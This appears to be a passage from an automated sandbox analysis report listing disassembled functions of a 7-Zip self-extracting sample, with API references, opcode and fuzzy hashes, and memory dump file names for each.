                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Long$System$HandleItemLoadMetricsModule$DirectoryFileFocusIconImageInfoShowmemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1941954457-0
                                                                                                                                                              • Opcode ID: 4ce41a19c34dbed912252fe1085521c74bbe77d36ffcb0daf1296095a0897fcf
                                                                                                                                                              • Instruction ID: 12ca57d93abc5c7172209863d00f0aa62b2a8778c6a716b1830c7bfba87c29dc
                                                                                                                                                              • Opcode Fuzzy Hash: 4ce41a19c34dbed912252fe1085521c74bbe77d36ffcb0daf1296095a0897fcf
                                                                                                                                                              • Instruction Fuzzy Hash: DB21EBB0A50258ABDB24EB54CC96BADB736BB44704F0401D9A7196B2C1DBB06EC4CF68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7F23A
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7F245
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7F250
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D7F25B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3936482309-0
                                                                                                                                                              • Opcode ID: 2e2384dddb8baa8a2fa7223c125eb72f32625424b0445866dad93f37847f26c9
                                                                                                                                                              • Instruction ID: c42a166c999a049348f31e383f2949da2115672909aa988f9a5cf6bed30e2faf
                                                                                                                                                              • Opcode Fuzzy Hash: 2e2384dddb8baa8a2fa7223c125eb72f32625424b0445866dad93f37847f26c9
                                                                                                                                                              • Instruction Fuzzy Hash: 99316374A04108EFDB04DF98C6A5B9EBBB1EF45308F2442D8E5096B342C775AF05EBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@ExceptionThrow_wmemmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2584154162-0
                                                                                                                                                              • Opcode ID: 8e57bd0b577aa0d4c11a5dd49dbf784e03861ebdbc33068f9bcdbbd2410b51ed
                                                                                                                                                              • Instruction ID: 69773380b23993a32ce50a54fd89fccaf7cdb73f52fe95fdb9db810d82f4ad56
                                                                                                                                                              • Opcode Fuzzy Hash: 8e57bd0b577aa0d4c11a5dd49dbf784e03861ebdbc33068f9bcdbbd2410b51ed
                                                                                                                                                              • Instruction Fuzzy Hash: EC11FEB5E00109AFCB04EF98D5859AEB7B5FF88300F208169E809A7345D731EE40DBB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3462485524-0
                                                                                                                                                              • Opcode ID: c87ed851d60a2ed490e16b9bbd6d6f11fe8013a934b81484f9203657a82175f8
                                                                                                                                                              • Instruction ID: 1fbff36c0814a0e33609d3dc0ef8c303416d10bff37c78fb3533af2533d5c9e8
                                                                                                                                                              • Opcode Fuzzy Hash: c87ed851d60a2ed490e16b9bbd6d6f11fe8013a934b81484f9203657a82175f8
                                                                                                                                                              • Instruction Fuzzy Hash: 251198B5E04209AFCB04EF98D9859AEB7B5FF48304F248159E809A7311D731EA54CBB5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D76BDA
                                                                                                                                                                • Part of subcall function 00D771D0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D771DA
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D76BE5
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D76BF0
                                                                                                                                                              • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00D76BFB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessorVirtual$Concurrency::RootRoot::
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3936482309-0
                                                                                                                                                              • Opcode ID: 07e5b5dbc88aa7fdb91b1a806a8719c839115a2308ba9c656b6df533bde66788
                                                                                                                                                              • Instruction ID: e5f37450c84ec85432aff1aafbc2f0f998e7335e8d21ace269df75bc7f9a6c0f
                                                                                                                                                              • Opcode Fuzzy Hash: 07e5b5dbc88aa7fdb91b1a806a8719c839115a2308ba9c656b6df533bde66788
                                                                                                                                                              • Instruction Fuzzy Hash: A5019774904108EFDB08EF88C6A5A6DB7B6EF44308F648188D8056B342CB71AF01EBE5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetParent.USER32(?), ref: 00D65C98
                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00D65CB3
                                                                                                                                                              • ScreenToClient.USER32(00000000,?), ref: 00D65CC1
                                                                                                                                                              • ScreenToClient.USER32(00000000,?), ref: 00D65CD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClientScreen$ParentRectWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2099118873-0
                                                                                                                                                              • Opcode ID: 8e512678a2eedded1ace145b9d5cdca1db5f0a20e272042733fcf1e4507dc160
                                                                                                                                                              • Instruction ID: ad869070cb3d90693a132ee496f2bbf6a72cfe1d6ab6e120b33504048d9a1a70
                                                                                                                                                              • Opcode Fuzzy Hash: 8e512678a2eedded1ace145b9d5cdca1db5f0a20e272042733fcf1e4507dc160
                                                                                                                                                              • Instruction Fuzzy Hash: 53F0DA79515208FBCB04DFA4DC58AAEB7B8EB48311F148544FD09C7310D635EA40DB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D689AF
                                                                                                                                                              • wsprintfW.USER32 ref: 00D689E1
                                                                                                                                                                • Part of subcall function 00D79450: _wmemmove.LIBCMTD ref: 00D7948E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorDebugHeap_wmemmovewsprintf
                                                                                                                                                              • String ID: (%d%s)
                                                                                                                                                              • API String ID: 2575367435-2087557067
                                                                                                                                                              • Opcode ID: 269a466badee18be8d8adb1dbcf86e9448d30ba688019cd758a55e21b7df12ec
                                                                                                                                                              • Instruction ID: 0cc2b0c55cdf9a35f254d3a7c17742e016142634815c225e4b1cbc0569b0ed16
                                                                                                                                                              • Opcode Fuzzy Hash: 269a466badee18be8d8adb1dbcf86e9448d30ba688019cd758a55e21b7df12ec
                                                                                                                                                              • Instruction Fuzzy Hash: CE01447195011C9BDB14EB58DC99BE9B378FB14304F5046D8A41D92142EB716E84CF75
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00D67521
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message
                                                                                                                                                              • String ID: 7-Zip SFX$Could not allocate memory
                                                                                                                                                              • API String ID: 2030045667-3806377612
                                                                                                                                                              • Opcode ID: 60af6774c3dde12110016e63e7655d578c5168c9736180cbeca7e7b7b88cb41d
                                                                                                                                                              • Instruction ID: 4d19705723c17268506bdd88c49397f700f6ea1d5bcf3a2538bdd02c1abd4608
                                                                                                                                                              • Opcode Fuzzy Hash: 60af6774c3dde12110016e63e7655d578c5168c9736180cbeca7e7b7b88cb41d
                                                                                                                                                              • Instruction Fuzzy Hash: 9DB092303EC3097FF10072E96C0FF167A88D708F96F400412F249A85C2D8C260545276
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%